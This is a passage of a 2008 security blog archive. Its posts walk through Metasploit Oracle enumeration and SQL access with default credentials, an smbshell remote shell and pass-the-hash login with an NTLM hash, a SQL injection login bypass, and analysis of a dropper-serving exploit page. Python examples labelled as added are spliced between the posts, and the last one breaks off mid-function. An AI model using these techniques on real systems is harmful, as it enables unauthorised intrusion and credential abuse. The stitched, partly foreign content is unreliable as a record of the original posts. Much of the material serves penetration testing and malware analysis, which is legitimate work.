8 packets received by filter

0 packets dropped by kernel

For the ninja shit, check out MC's demo text file.

**Issues: you can't see the output of your command, so you have to run things whose results you can observe some other way; see the demo text file.

If you care to clean up, just revoke your DBA privileges with the oracle_sql module:

"revoke dba from scott"
"revoke javasyspriv from scott"

That's it!

Sunday, November 16, 2008

Oracle Pwnage with the Metasploit Oracle Modules Part 1

Every so often you come across an open 1521 on a pentest.

1521/tcp open oracle

But what to do? There aren't a ton of what I consider usable Oracle exploits out there, and the ones that are there involve installing a bunch of extra libraries, and we know that's "tough" to do. Thankfully MC has done all the work for us and created the Metasploit mixin and modules. **Need help getting the mixin installed? See my file format post.

All the fun is available here:

We start with Oracle version enumeration:

msf > use auxiliary/scanner/oracle/oracle_version
msf auxiliary(oracle_version) > info

Name: Oracle Version Enumeration
Version: $Revision$

Provided by:

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

This module simply queries the TNS listner for the Oracle build.

msf auxiliary(oracle_version) > set RHOSTS
msf auxiliary(oracle_version) > run

[*] Host is running: 32-bit Windows: Version - Production

Next step is to determine the SID that the Oracle instance is running as:

msf > use auxiliary/scanner/oracle/oracle_sid
msf auxiliary(oracle_sid) > info

Name: Oracle SID Enumeration
Version: $Revision$

Provided by:

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

This module simply queries the TNS listner for the SID.

msf auxiliary(oracle_sid) > set RHOSTS
msf auxiliary(oracle_sid) > run

[*] Identified SID for UNLUCKYDB
[*] Auxiliary module execution completed
msf auxiliary(oracle_sid) >

Next we use the oracle_sql module to execute SQL queries against the database. This is handy to 1) run SQL queries and 2) check privileges if you've managed to find some working passwords (hint):

msf > use auxiliary/admin/oracle/oracle_sql
msf auxiliary(oracle_sql) > info

Name: Run simple SQL against the Oracle instance
Version: $Revision:$

Provided by:

Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.
SQL select * from v$version no The SQL to execute.

This module will allow for simple sql statements to be execute
against a given oracle instance given the appropriate credentials.

msf auxiliary(oracle_sql) > set RHOST
msf auxiliary(oracle_sql) > set SID UNLUCKYDB
msf auxiliary(oracle_sql) > run

[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[*] Sending SQL...
[-] ORA-12514: TNS:listener does not currently know of service requested in connect descriptor
[-] undefined method `prepare' for #
[-] undefined method `each' for nil:NilClass
[*] Done...
[-] Auxiliary failed: NoMethodError undefined method `disconnect' for #
[-] Call stack:
[-] (eval):48:in `run'
[*] Auxiliary module execution completed

WTF! No FTW on that one. Googling the error ORA-12514 hints at the Oracle instance not being set up the way we assumed. Let's see if we can get some more info. Using (oldie but a goodie), let's see if we get some additional information with the status command:

cg@WPAD:~/evil/db/oracle$ perl status -h
sending (CONNECT_DATA=(COMMAND=status)) to
writing 89 bytes
. .......6.........S. ...........]........(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)
(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version - Production)(START_DATE=13-11TB-200809:50:24)(SIDNUM=1)(LOGFILE=e:\oracle\ora92\network\log\listener.log)
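Everything useful in that reply is in the nested (KEY=VALUE) descriptor after the packet header, and the same syntax is what tnsnames.ora and the services reply use. Below is an added example (not from the post and not the status tool it uses) that parses a descriptor into a tree, flags what a defender should notice in a status reply, and walks a services-style reply for SERVICE_NAME values, which is the answer to the ORA-12514 above: the listener wants a service name, not the SID. Both replies are constructed in the shape of the output shown (the leading bytes stand in for the TNS packet header and are skipped; the version numbers are left out, as they are in the post; the services reply and the instance name unluckydb are made up). Reading SECURITY=OFF as "no listener password set" follows the usual tnscmd interpretation.

```python
"""Parse TNS listener replies and report what they disclose.

Added example, not from the original post or from the listener-status tool
it uses. STATUS_REPLY is constructed in the shape of the reply shown above;
SERVICES_REPLY is constructed in tnsnames descriptor syntax. Neither was
captured from a real listener.
"""


STATUS_REPLY = (
    "\x00\x59\x00\x00\x06\x00\x00\x00"  # placeholder bytes standing in for the packet header
    "(DESCRIPTION=(TMP=)(VSNNUM=153092352)(ERR=0)(ALIAS=LISTENER)"
    "(SECURITY=OFF)(VERSION=TNSLSNR for 32-bit Windows: Version - Production)"
    "(START_DATE=13-NOV-2008 09:50:24)(SIDNUM=1)"
    "(LOGFILE=e:\\oracle\\ora92\\network\\log\\listener.log))"
)

SERVICES_REPLY = (  # constructed: two services, the second is the ExtProc default
    "(DESCRIPTION=(SERVICES_LIST="
    "(SERVICE=(SERVICE_NAME=UNLUCKYXDB.MYPWN)(INSTANCE=(INSTANCE_NAME=unluckydb)))"
    "(SERVICE=(SERVICE_NAME=PLSExtProc)(INSTANCE=(INSTANCE_NAME=PLSExtProc)))))"
)


def parse_tns(reply):
    """Parse a TNS descriptor into nested dicts; repeated keys become lists.
    Anything before the first '(' (the packet header) is ignored."""
    start = reply.find("(")
    if start < 0:
        raise ValueError("no descriptor in reply")
    tree, _ = _parse_siblings(reply, start)
    return tree


def _parse_siblings(s, i):
    """Parse a run of sibling (KEY=VALUE) groups at s[i]; return (dict, next index)."""
    result = {}
    while i < len(s) and s[i] == "(":
        key, value, i = _parse_group(s, i)
        if key in result:  # e.g. several SERVICE or ADDRESS entries
            if not isinstance(result[key], list):
                result[key] = [result[key]]
            result[key].append(value)
        else:
            result[key] = value
        while i < len(s) and s[i].isspace():
            i += 1
    return result, i


def _parse_group(s, i):
    """Parse one (KEY=VALUE) group where VALUE is scalar text or nested groups."""
    if s[i] != "(":
        raise ValueError(f"expected '(' at offset {i}")
    eq = s.index("=", i)
    key = s[i + 1:eq].strip()
    i = eq + 1
    while i < len(s) and s[i].isspace():
        i += 1
    if i < len(s) and s[i] == "(":
        value, i = _parse_siblings(s, i)
    else:
        close = s.index(")", i)
        value = s[i:close].strip()  # scalar, may be empty as in (TMP=)
        i = close
    if i >= len(s) or s[i] != ")":
        raise ValueError(f"unbalanced descriptor near offset {i}")
    return key, value, i + 1


def find_values(node, key):
    """Collect every value stored under key anywhere in the tree, in document order."""
    found = []
    if isinstance(node, dict):
        for k, v in node.items():
            if k == key:
                found.extend(v if isinstance(v, list) else [v])
            else:
                found.extend(find_values(v, key))
    elif isinstance(node, list):
        for item in node:
            found.extend(find_values(item, key))
    return found


def listener_findings(tree):
    """What a defender should notice in a status reply returned to an unauthenticated client."""
    desc = tree.get("DESCRIPTION", {})
    notes = []
    if str(desc.get("SECURITY", "")).upper() == "OFF":
        notes.append("listener password not set (SECURITY=OFF)")
    if desc.get("VERSION"):
        notes.append("version string disclosed: " + desc["VERSION"])
    if desc.get("LOGFILE"):
        notes.append("log file path disclosed: " + desc["LOGFILE"])
    return notes


if __name__ == "__main__":
    for note in listener_findings(parse_tns(STATUS_REPLY)):
        print("-", note)
    print("services:", find_values(parse_tns(SERVICES_REPLY), "SERVICE_NAME"))
```

The three findings are the ones to fix on the listener side: an unauthenticated client should not get a version banner, an absolute log path, or confirmation that no listener password is set. The service-name walk is the defender's half of the ORA-12514 story too: comparing the names a listener advertises against what it is supposed to serve catches instances registered with a listener nobody meant to expose.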

Let's try it with the service name: UNLUCKYXDB.MYPWN

msf auxiliary(oracle_sql) > set SID UNLUCKYXDB.MYPWN
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Oracle9i Enterprise Edition Release - Production
[*] PL/SQL Release - Production
[*] CORE Production
[*] TNS for 32-bit Windows: Version - Production
[*] NLSRTL Version - Production
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(oracle_sql) >

**Yeah, it worked. Now it's time to get some more useful info.

msf auxiliary(oracle_sql) > set SQL "select * from user_role_privs"
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run

[*] Sending SQL...
[*] Done...
[*] Auxiliary module execution completed

That's it for part 1. In part 2 we'll use some SQLi to hopefully bump Scott up to DBA and execute some OS commands.


Saturday, November 15, 2008

Blown to Bits: Your Life, Liberty, and Happiness After the Digital Explosion Book Review

by Hal Abelson, Ken Ledeen, Harry Lewis

4 stars

Witty (Hopefully) Amazon Title: My bits are gone and I want them back!

The authors of Blown to Bits: Your Life, Liberty, and Happiness After the Digital Explosion cover both new and old technologies and how they relate to today's cultural and political climates. They drive home the history of most of the technologies we can't live without and their tumultuous relationship with the legislative and judicial branches of the American government.

Breakdown of the chapters:

Chapter 1: Digital Explosion: Why Is It Happening, and What Is at Stake?
Chapter 2: Naked in the Sunlight: Privacy Lost, Privacy Abandoned
Chapter 3: Ghosts in the Machine: Secrets and Surprises of Electronic Documents
Chapter 4: Needles in the Haystack: Google and Other Brokers in the Bits Bazaar
Chapter 5: Secret Bits: How Codes Became Unbreakable
Chapter 6: Balance Toppled: Who Owns the Bits?
Chapter 7: You Can't Say That on the Internet: Guarding the Frontiers of Digital Expression
Chapter 8: Bits in the Air: Old Metaphors, New Technologies, and Free Speech
Conclusion: After the Explosion

All the chapters were well written, informative and flow well together. I felt the authors did a great job breaking down the technical concepts behind the technologies well enough to give the required background (technical but not too technical) and then move into the political discussions of those technologies. The real value of the book was the "Your Life, Liberty, and Happiness" portion of the discussions. They discuss how the world has changed now that we are moving away from paper and everything is in bits. Who owns those bits, what are the government and industry allowed to do with those bits, and what about privacy in our lives now that very detailed profiles of people can be generated from those bits (especially since we gave that information away for a few cents off at the register or for some "free service")?

There are plenty of books that discuss the 1's and 0's of the concepts but few I have read that talk about the privacy, governmental or cultural issues that arise from those technologies. Like one of the other reviewers(1) mentioned, there are plenty of "gee whiz" moments along with plenty of "I can't believe they did that" moments as well. A great read.


Friday, November 14, 2008

Link: Writing malicious macros using metasploit

Good blog post over at securiteam on using the exe2vba portion of metasploit to embed malicious code into office documents. Fun!

Of course those attacks can be mitigated with proper group policy, but most places "need their macros!" so enjoy the pwnings.

Tuesday, November 11, 2008

Passing the Hash and other fun with Tenable smbshell


smbshell is a pre-compiled NASL script which can be used as a standalone tool to do the following tasks:
  • Navigate thru the remote SMB shares and download files or obtain their version number
  • Read/Enumerate the remote SMB registry
  • Query/Start/Stop/Pause remote services
  • Obtain an interactive shell (cmd.exe) on the remote host


smbshell is a pre-compiled NASL script - therefore, you need to install Nessus 3 first.
To run smbshell, download it and run it thru the 'nasl' command-line utility:
$ /opt/nessus/bin/nasl -t TargetIP smbshell.nbin
Under Windows, you need to copy it under C:\Program Files\Tenable\Nessus\Plugins\Scripts\. Then you can do:
C:\> Program Files\Tenable\Nessus\nasl.exe -t TargetIP smbshell.nbin


cg@WPAD:~/evil/passthehashstuff$ /opt/nessus/bin/nasl -t smbshell.nbin

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--

[*] username: smbshell
[*] password:
[*] domain (optional):
[*] Connecting to
[*] Authenticating to

smbshell> help

The following commands are supported :

help - the current screen
ftp - SMB ftp client
reg - registry browser
users - SMB users & groups browser
services - service manager
quit/exit - exit


Oh, and shell. Shell is fun:

[*] Opening share ADMIN$...
[*] Connected to ADMIN$ ( ->
[*] Installing remote command service...
[*] Remote command service installed.
[*] Connecting to remote command service...
[*] Connected to remote command service.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\WINDOWS\system32>echo woot
echo woot


Windows IP Configuration

Ethernet adapter Local Area Connection:

Media State . . . . . . . . . . . : Media disconnected

Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . :
Subnet Mask . . . . . . . . . . . :
Default Gateway . . . . . . . . . :


[*] Removing remote command service...
[*] Remote command service removed.

Pass the Hash info

--==[SMB Shell v0.3 (c) 2007 Tenable Network Security]==--
[*] username: administrator
[*] password: **Just hit enter here**
[*] hash: NTLM:78164FD1E988FE5B39E0474EEE475E51
[*] domain (optional):
[*] Connecting to
[*] Authenticating to

If you have no idea what nasl is

Thanks to MC for bringing this up to me.

Lastly, If I see this shit in some "cutting edge hacker techniques" webcast without a mention of this post I'm gonna go off because this has been out for over two years...I'll leave it at that.

Saturday, November 8, 2008

Intrusion Debt and Security ROI and Security Malpractice

Richard Bejtlich has a new post linked to an older post and mentions the idea of intrusion debt as the counter argument to security ROI. I agree with RB that there is no ROI on security (he has lots of posts arguing this and they are good reads): doing things safely is your ROI, operating your network without compromise and data loss (or minimizing it) is your ROI, protecting your IP is your ROI. The slides in the new post ask what would happen if we allowed people who build bridges to operate at the same standards as those who build networks. Scary, right?

"Imagine that you defer that cost by not detecting and responding to the intrusion. Perhaps the intruder is stealthy. Perhaps you detect the attack but cannot respond for a variety of reasons. The longer the intrusion remains active, I would argue, the more debt one builds."

"How many CEOs/CIOs/CTOs/CISOs/CSOs will look at the digital wreckage of an incident and wonder "why didn't we see this happening?""

The key to that is catching it in the first place and being able to adequately respond, or having policies in place for once you do see it. In 2008 I didn't think we would still be there, but we are, and it's sad.

I think business and government entities are lucky about how much they are allowed to shield (lie to) their customers and employees about network compromises. If a network has been owned for several months and the appropriate action wasn't taken (so at some point the compromise was discovered), should that be grounds for fines or lawsuits? You know that any domain will have some type of PII, intellectual property, or something worth protecting floating around. What are people to do about network/security malpractice? Is it feasible to hold those CxO people accountable at that level? What are common people supposed to do when there is gross negligence with their information? Current laws, regulation, and fines obviously aren't working or aren't a sufficient deterrent, and I'm not sure asking a technology-immature legislative system to come up with more unenforceable laws is a good solution either.

Thoughts on what to do?

Tuesday, November 4, 2008

EFF NSA shirt...I gots mine!


Saturday, November 1, 2008

Implementing NAP and NAC Security Technologies Book Review

Implementing NAP and NAC Security Technologies: The Complete Guide to Network Access Control

Dan Hoffman

4 stars

Witty Title for Amazon: Clear and Actionable Advice on Choosing the Right NAC Solution

I was asked to read a pre-release copy of the book, my quote made it onto the book, and I was given a review copy.

I found myself in a position to learn about the different types of NAC appliances as well as Mobile NAC. The problem is that I don't work for a NAC vendor or install NACs for a living. Googling left me with tons of vendor hype on NAC but not a lot of good information to help me understand the different types of NACs, how they work, and why I would choose one type over the other. Dan Hoffman's book is the only NAC book I know of that is (mostly) vendor neutral. The only other NAC/NAP books I know of are Cisco Press books, which obviously tout Cisco products as the best way to go. Dan Hoffman breaks down the functionality of NAC and the different types of NAC solutions into simple, easy to understand language, just like he did for Blackjacking on mobile threats. He has a great knack for explaining technical systems and topics in an easy to understand way.

Here is a list of what he covers in the book:

CH1 Understanding Terms and Technologies
CH2 The Technical Components of NAC Solutions
CH3 What Are You Trying to Protect?
CH4 Understanding the Need for LAN-Based NAC/NAP
CH5 Understanding the Need for Mobile NAC
CH6 Understanding Cisco Clean Access
CH7 Understanding Cisco Network Admission Control Framework
CH8 Understanding Fiberlink Mobile NAC
CH9 Understanding Microsoft NAP Solutions
CH10 Understanding NAC and NAP in Other Products

My favorite chapters are CH3 "What Are You Trying to Protect?", CH4 "Understanding the Need for LAN-Based NAC/NAP", and CH5 "Understanding the Need for Mobile NAC."

By far the most important chapter is chapter three, where Dan walks through the questions an organization needs to ask itself before it purchases a NAC solution. The company needs to know whether it is trying to protect LAN-based or Mobile assets, and it needs to know exactly what it is trying to protect those assets against. Dan discusses the various scenarios that come out of those two questions, and the two follow-on chapters provide even more detail on how the two types of solutions (LAN-based and Mobile NAC) work and how they differ from one another. Chapter two covers the details of the different parts of NAC, and Chapters 6-10 give some of the specifics about different NAC vendors' solutions (not a complete list).

The only thing I didn't like about the book was that it really didn't cover bypassing NAC. It would have been nice to see some content on how NAC is currently being bypassed or what NAC doesn't protect against and how to mitigate against it.


Tuesday, October 28, 2008

Maltego Malware Domain List Transforms

Not much hype about the release but the Paterva crew has introduced some really useful transforms for Maltego that utilize Malware Domains List's database.

"We've created a transform application server for integration with the DB. If you want to see how it works you can download the Community Edition of Maltego (if you don't have it already) from

Once you have it running you should go to Tools -> Manage transforms and click on Discover Transforms.
You can now add a new discovery server with name "MALTAS" and URL"


Pretty handy when all you have is a possible bad IP and want to see if they are already on the "bad boy" list. Being able to see the URL serving up the malware is handy too so you can grab it for analysis.

Thoughts on why we need exploit code and hacker tools

Dean made a comment in the SILC channel about a student who:

"student thinks its terrible to release tools, exploits, etc...he says it makes it too easy for people to attack America"

It's not the first time I've heard that argument, but after a few weeks in the new gig I have a newfound understanding of the need to provide "absolute proof" of exploitation or of the ability to exploit something.

So while on one hand I understand that exploit code and tools allow bad guys to do what they do, on the other hand you have people that require you, as their security person, to show them with absolute certainty that something happened or could happen. Otherwise there is no "proof." And if I need to show proof to get a problem fixed, mitigated, or a policy changed or put in place, it's nice to have the ability to do that.


Saturday, October 25, 2008

Multiple Thoughts on Multiple Security Issues

I'm too tired to put enough effort into several blog posts even though I really want to, but next week is already looking painful, so I'm going to throw several different thoughts into this post.

First Thought: The CISSP CBK ain't so bad...

After spending the last week explaining what I consider core security ideals to people that should know better, I found myself really feeling that a senior security person should understand those core ideals as a minimum level of competency. For a keyboard guy, my opinion stands that the CISSP is not a measure of their ability, but I would expect a "hands-on" guy to know that material as well.

The latest TaoSecurity post mentions NIST 800-27, Engineering Principles for Information Technology Security (A Baseline for Achieving Security); maybe I'll start recommending that.

Second Thought: What should a CxO know?

I'm new to the whole CxO thing, but shouldn't your CIO/CTO/CISO types understand the things from the first thought? I am thinking yes, they should have more than a PMP to make smart security decisions, but I'd like some feedback on that. Like I said, I'm new to that kind of environment. A lot of the people on the SBN that hold those positions seem to understand those concepts.

Third Thought: How do you fix a "porous" network?

By porous I mean more than one security hole at any one time, and usually a LARGE security hole. Back to the first thought: people seem to think that if you can fix one problem the rest magically put themselves on hold while you fix that one and you can "catch up"...not! I am also new to real Incident Handling and Response (in the past I've been the guy getting to cause all the trouble), but I'm finding more and more holes and issues as we try to mitigate and fix the first issue. How do you make people understand that the problems don't stop coming in if you have poor network security or poor network design?

Fourth Thought: Initial feeling on SIMs

My initial take on Security Information Management devices is that they are a great concept. I'm starting to play with Cisco MARS and thus far I am impressed with what it SHOULD be able to do. I'll let you know later how well it does.

Fifth Thought: Another unauthenticated full remote MS exploit...SCORE!

I love bugs that are on the level of MS03-026, MS04-011, and MS06-040. Mass pwnage on pentests is awesome. I hope this new MS08-067 ends up being that bad (and the msf module comes out at some point). We need a new DCOM or LSASS exploit. I love it when we get proof that network security isn't dead.

Last Thought: Really more of a "what would you do/recommend"

In our fictional example you found pwdump on your Domain Controller (not put there by one of your admins) and the registry keys point heavily to it having been run successfully and the results having been downloaded. What do you do, or recommend to the customer?

The book/draconian answer is to wipe everything and start over. In people's experience, is that a real option for a real network without the ability for mass downtime? Is a mass password reset considered enough of a mitigation?

Would appreciate input from the people out there on our fictional scenario.

Wednesday, October 22, 2008

Malware targeting industrial control software(?)

So this morning I was doing my usual malware roundup and looking for anything new or vaguely interesting. Lots of the usual sites all serving the same thing: the pdf exploit (I've a special fondness for this one, see the pentesting failures post), the snapshot_viewer_activex exploit, ms08_053, realplayer11, ms08_011, ms06_014 and a few others. All pretty popular right now.

Then I saw a site that has been floating around serving up malware for a while now. It's been up for about a year I think. It's always had a nice index.htm page with a list of iframes serving up all of the above and some others. I generally have a quick look every now and again and find it's always the same stuff. Lots of reuse of exploits, etc...

Today was a surprise as I found something 'new'. The page has another exploit added. Nothing new about that but it's what the exploit is for that is surprising.


In August a stack overflow exploit in the Iconics Vessel ActiveX control was released. The exploit is in dlgwrapper.dll [Dialog Wrapper Module ActiveX control]. Tebo and kf wrote a Metasploit exploit module for it. [].

Iconics makes plant automation software for various industries including oil, gas, pharma, airports, etc... SCADA anyone?

A quick decode of the ucs2 encoded payload reveals:


The exploit downloads taskmgr.exe, a dropper that installs a second-stage piece of malware. I've not downloaded that as yet, so I don't know the actual payload or its function.
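Added example (this is not the decode from the original post): a decoder for the `%uXXXX` (UCS-2) escaped form in which such exploit pages carry their payload, followed by a strings-style sweep that pulls out the download URL the way the decode above did. The sample payload is constructed, with filler bytes and a placeholder host (dropper.invalid), not the real page's bytes or host.

```python
"""Decode a %u-escaped (UCS-2) payload string and pull out embedded strings.

Added example; this is not the decode from the original post. SAMPLE_PAYLOAD
is constructed: eight 0x90 filler bytes followed by a placeholder download
URL (dropper.invalid), which is not the real host from the page.
"""
import re
import struct

# Constructed sample in the %uXXXX form that exploit pages feed to unescape():
# each unit is two bytes, little-endian, so the text "ht" becomes %u7468.
SAMPLE_PAYLOAD = (
    "%u9090%u9090%u9090%u9090"                      # 8 filler bytes
    "%u7468%u7074%u2f3a%u642f%u6f72%u7070%u7265"    # http://dropper
    "%u692e%u766e%u6c61%u6469"                      # .invalid
    "%u742f%u7361%u6d6b%u7267%u652e%u6578%u0000"    # /taskmgr.exe\0
)

U_UNIT = re.compile(r"%u([0-9a-fA-F]{4})")
URL = re.compile(rb"https?://[\x21-\x7e]+")


def decode_ucs2(escaped):
    """Turn every %uXXXX unit back into the two little-endian bytes it carries."""
    return b"".join(struct.pack("<H", int(u, 16)) for u in U_UNIT.findall(escaped))


def printable_strings(data, min_len=4):
    """Runs of printable ASCII, a strings(1)-style sweep of the decoded bytes."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def find_urls(data):
    """URLs embedded in the decoded payload: where the second stage is fetched."""
    return [m.group().decode("ascii") for m in URL.finditer(data)]


def summarise(escaped):
    """Decode and report the figures an analyst records: size, filler, URLs."""
    data = decode_ucs2(escaped)
    return {
        "bytes": len(data),
        "leading_nops": len(data) - len(data.lstrip(b"\x90")),
        "strings": printable_strings(data),
        "urls": find_urls(data),
    }


if __name__ == "__main__":
    for key, value in summarise(SAMPLE_PAYLOAD).items():
        print(key, value)
```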

I guess what is interesting to me is that the malware authors have decided to use an exploit that has a somewhat small target audience. I could be wrong as I'm not that familiar with those industries and perhaps the software is really widespread.

dean de beer

Sunday, October 19, 2008

ChicagoCon Fall 2008

As usual Don has a great lineup for ChicagoCon 2008f.

ChicagoCon, a bi-annual security event held in the Windy City, features an Ethical Hacking Conference for two days of cutting-edge talks, peer networking and career advancement in the exciting and growing field of computer security for only $100. Microsoft penetration testers AKA ethical hackers, Billy Rios and John Walton headline an impressive list of presentations by researchers, practitioners and executives on Oct 31 and Nov 1, 2008.

ChicagoCon 2008f: White Hats Come Together in Defense of the Digital Frontier

October 27 – November 2, 2008

The (f)all edition of this bi-annual security event features 12 boot camps (M-F), exams on-site followed by a 2-Day Ethical Hacking Conference (Fri – Sat) featuring Microsoft Hackers AKA Blue Hats Billy Rios and John Walton along with many other speakers and activities.

Con Only Tickets available for just $100.

Courses: CISSP, CISA, CEH, CHFI, ECSA, CWNA, Advanced Technical Hacking (Pen Testing, Web Apps and Reverse Engineering), Cisco CCENT/CCNA, Microsoft ISA Server and a combined CompTIA Network+/Security+ class. Novice, ultimate techie, CISO chair... everyone interested in a security career will find something at ChicagoCon.

Keynotes: Ed Skoudis (SANS, Intelguardians), Gregory Conti (West Point, Author "Security Data Visualization") and Daniel V. Hoffman (CTO SMobile Systems, EH-Net Columnist). Presented by

A list of the speakers is available here:

From Virus Alert to Pwnage Part 2

Some analysis on 2.exe.

2.exe : Not detected by Sandbox (Signature: NO_VIRUS)

[ DetectionInfo ]
* Sandbox name: NO_MALWARE
* Signature name: NO_VIRUS
* Compressed: YES
* TLS hooks: NO
* Executable type: Application
* Executable file structure: OK
* Filetype: PE_I386

[ General information ]
* Decompressing UPX3.
* File length: 2560 bytes.
* MD5 hash: c6e1de2f6ecae93c09c6bae78d8edcbf.

[ Changes to registry ]
* Creates key "HKCU\Software\Microsoft\Sound".

AhnLab-V3 2008.10.15.0 2008.10.14 -
AntiVir 2008.10.14 -
Authentium 2008.10.14 -
Avast 4.8.1248.0 2008.10.15 -
AVG 2008.10.15 -
BitDefender 7.2 2008.10.15 Trojan.Zlob.1.Gen
CAT-QuickHeal 9.50 2008.10.14 -
ClamAV 0.93.1 2008.10.15 -
DrWeb 2008.10.15 -
eSafe 2008.10.12 Suspicious File
eTrust-Vet 31.6.6148 2008.10.14 -
Ewido 4.0 2008.10.14 -
F-Prot 2008.10.14 -
F-Secure 8.0.14332.0 2008.10.15
Fortinet 2008.10.14 -
GData 19 2008.10.15 Trojan.Zlob.1.Gen
Ikarus T3. 2008.10.15 -
K7AntiVirus 7.10.493 2008.10.14 -
Kaspersky 2008.10.15
McAfee 5405 2008.10.14 -
Microsoft 1.4005 2008.10.15 -
NOD32 3522 2008.10.14 -
Norman 5.80.02 2008.10.14 -
Panda 2008.10.14 Suspicious file
PCTools 2008.10.14 -
Prevx1 V2 2008.10.15 Malicious Software
Rising 2008.10.14 -
SecureWeb-Gateway 6.7.6 2008.10.15 -
Sophos 4.34.0 2008.10.15 Sus/Behav-1005
Sunbelt 3.1.1722.1 2008.10.14 -
Symantec 10 2008.10.15 Downloader
TheHacker 2008.10.15 -
TrendMicro 8.700.0.1004 2008.10.14 PAK_Generic.001
VBA32 2008.10.14 -
ViRobot 2008.10.14.1419 2008.10.14 -
VirusBuster 2008.10.14 -
Additional information
File size: 2560 bytes
MD5...: c6e1de2f6ecae93c09c6bae78d8edcbf
SHA1..: 1b1d7916206583a57e54fe82ebe05a8fb55b25d5
SHA256: 68350cc81af2e867eecea64f1cc83e34ff8c19ad22b8c077529380cdadeaa658
SHA512: 512fd40e91bd47c1e6f1a0e202457cc5fe31ed90a2555f9af8a54796663b3c7a
PEiD..: -
TrID..: File type identification
UPX compressed Win32 Executable (39.5%)
Win32 EXE Yoda's Crypter (34.3%)
Win32 Executable Generic (11.0%)
Win32 Dynamic Link Library (generic) (9.8%)
Generic Win/DOS Executable (2.5%)
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0x4041c0
timedatestamp.....: 0x48eeb35b (Fri Oct 10 01:43:55 2008)
machinetype.......: 0x14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
UPX0 0x1000 0x3000 0x0 0.00 d41d8cd98f00b204e9800998ecf8427e
UPX1 0x4000 0x1000 0x400 6.22 ad30fe5c04339024e6b3344e72484898
UPX2 0x5000 0x1000 0x200 2.06 ebb1b5a9cd4ce06c69ef5ac4d3d7b72b

( 2 imports )
KERNEL32.DLL: LoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc,
VirtualFree, ExitProcess
ADVAPI32.dll: RegCloseKey

( 0 exports )
Prevx info:
packers (Kaspersky): PE_Patch.UPX, UPX
packers (F-Prot): UPX

Filename c:\2.exe
Filesize 2560 bytes
MD5 c6e1de2f6ecae93c09c6bae78d8edcbf
Loaded DLLs
Process Management Creates Process - Filename () CommandLine:
(C:\Program Files\Internet Explorer\iexplore.exe As User: () Creation Flags: ()


Found a norton report based on the IP

Severity: High

3 instances found. Here is a sample:


**show tcpstream from running the 2.exe in a VM

GET /stuff/border9.gif HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)
Connection: Keep-Alive

HTTP/1.1 404 Not Found
Server: nginx/0.5.20
Date: Wed, 15 Oct 2008 20:27:23 GMT
Content-Type: text/html
Content-Length: 529
Connection: close

head title 404 Not Found /title /head
body bgcolor="white"
center h1 404 Not Found /h1 /center
hr center nginx/0.5.20 /center
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --
!-- The padding to disable MSIE's friendly error page --

**I removed the brackets because blogspot kept rendering the html :-(

Saturday, October 18, 2008

Webapp Assessments Rule, or 'why running as dbo is bad'

I just finished up a web application assessment for a client as part of an audit. All I can say is that I've not had that much fun on a web app pentest in ages!

All I was provided with was an ip address. Total blackbox testing. This usually sucks because if you can't get by the login screen, telling the client that, well, the design sucks does not go down well. I like to bring at least a little value.

I had a quick look at the login page and bamn! Full admin access. Yep, 'or 1=1-- lives on. No encoding or filters to bypass at all. As usual the first user in the database was Admin too. After adding another admin user and browsing through the site it was time to see what the database contained. Turns out all the error pages were generic pages as detailed error messages had been disabled. Blind SQLi on .aspx pages sucks. I thought this was going to go from quick pwnage to a long ordeal to get the data. Enter Pragmatk. Prag is a friend of mine that just rocks at webapp stuff. We sat down and after visiting all the pages and forms that accepted user input we actually found one that returned database error messages. W00t! Let the games begin!
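The login check behind that 'or 1=1-- result, as an added example (not the client's code): the string-built query the input lands in, beside the parameterised form that treats the same input as data. It assumes an in-memory SQLite users table constructed here, with Admin as the first row as in the post.

```python
"""The login check the post bypassed with ' or 1=1--, beside its fixed form.

Added example, not the client's code. Uses an in-memory SQLite table built
here; as in the post, the first user is Admin. Passwords are stored in clear
only to keep the query readable; a real table holds salted hashes.
"""
import sqlite3


def make_db():
    """Constructed users table with Admin as the first row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("Admin", "constructed-admin-pw"), ("dean", "constructed-user-pw")])
    return conn


def login_vulnerable(conn, username, password):
    """Query text built from user input: the quote and the -- comment become SQL,
    so the WHERE clause collapses to 'username = '' or 1=1' and the first row
    (Admin) is returned. Returns the matched username, or None."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: the input is data, never SQL text."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
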